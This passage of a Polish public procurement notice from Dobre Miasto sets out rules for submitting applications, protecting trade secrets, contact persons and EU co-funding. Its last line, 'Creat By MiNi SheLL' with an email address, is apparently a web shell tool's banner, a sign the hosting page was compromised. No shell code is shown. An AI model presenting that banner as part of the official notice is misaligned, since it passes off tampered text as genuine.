7.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, kopie dokumentów dołączonych do oferty, dotyczących Wykonawcy, muszą być potwierdzone za zgodność z oryginałem przez Wykonawcę. 
8.	W przypadku podmiotów, które udostępniają swoje zasoby, a które będą uczestniczyć w wykonywaniu zamówienia, kopie dokumentów dołączonych do wniosku, dotyczące tych podmiotów, muszą być potwierdzone za zgodność z oryginałem przez te podmioty. 
9.	Jeżeli Wykonawca polega na zdolnościach finansowych innych podmiotów, kopie dokumentów dotyczących tych podmiotów muszą być potwierdzone za zgodność z oryginałem przez te podmioty. 
10.	Zaleca się, aby wniosek wraz z załączonymi dokumentami złożyć w formie uniemożliwiającej rozsypanie kartek a wszystkie strony ponumerować. 
11.	Wykonawca może złożyć tylko jeden wniosek o dopuszczenie do udziału w postępowaniu. Złożenie przez Wykonawcę wniosku samodzielnie oraz równoczesne występowanie jako jeden ze wspólników z innym wnioskiem, Zamawiający potraktuje jako czyn nieuczciwej konkurencji.
12.	W przypadku, gdy zawarte we wniosku informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993r. o zwalczaniu nieuczciwej konkurencji (tj. Dz. U. z 2003r. Nr 153, poz. 1503 z późn. zm.) Wykonawca, nie później niż w terminie składania wniosków, zastrzega, że nie mogą one być udostępnione. Informacje zastrzeżone jako tajemnica przedsiębiorstwa Wykonawca składa w kopercie oznakowanej napisem tajemnica przedsiębiorstwa umieszczonej np. wewnątrz opakowania zawierającego wniosek lub złożone spięte (zszyte) oddzielnie od pozostałych, jawnych elementów wniosku. Wszystkie strony części zastrzeżonej wniosku powinny być również oznakowane napisem tajemnica przedsiębiorstwa oraz ponumerowane. Nie złożenie stosownego zastrzeżenia najpóźniej w terminie składania wniosków spowoduje, ze cały wniosek zostanie udostępniony, na życzenie każdego uczestnika postępowania.
13.	Zamawiający zastrzega, że wniosek o dopuszczenie do udziału w postępowaniu wraz z załącznikami należy złożyć w formie pisemnej. 

Forma porozumiewania się Zamawiającego z Wykonawcami:
1.	Oświadczenia, wnioski, zawiadomienia oraz informacje będą przekazywane przez strony postępowania pisemnie, faksem lub drogą elektroniczną. W przypadku przekazywania oświadczeń, wniosków, zawiadomień oraz informacji za pomocą faksu lub drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdzi fakt ich otrzymania.
2.	Formularz wniosku o dopuszczenie do udziału w postępowaniu można uzyskać drogą elektroniczną, po uprzednim skierowaniu do Zamawiającego pisemnej prośby przekazanej w jednej z wybranych form, opisanych powyżej. 

Wykaz osób uprawnionych do porozumiewania się z Wykonawcami:
1.	Piotr Lipiński tel.  89  615 10  69    - w  sprawach  technicznych
2.	Magdalena Iwanek   tel.  89  615 39 59    - w sprawach dotyczących procedury przetargowej.
Adres poczty elektronicznej: info@dobremiasto.com.pl

Projekt współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego 
Warmia i Mazury na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com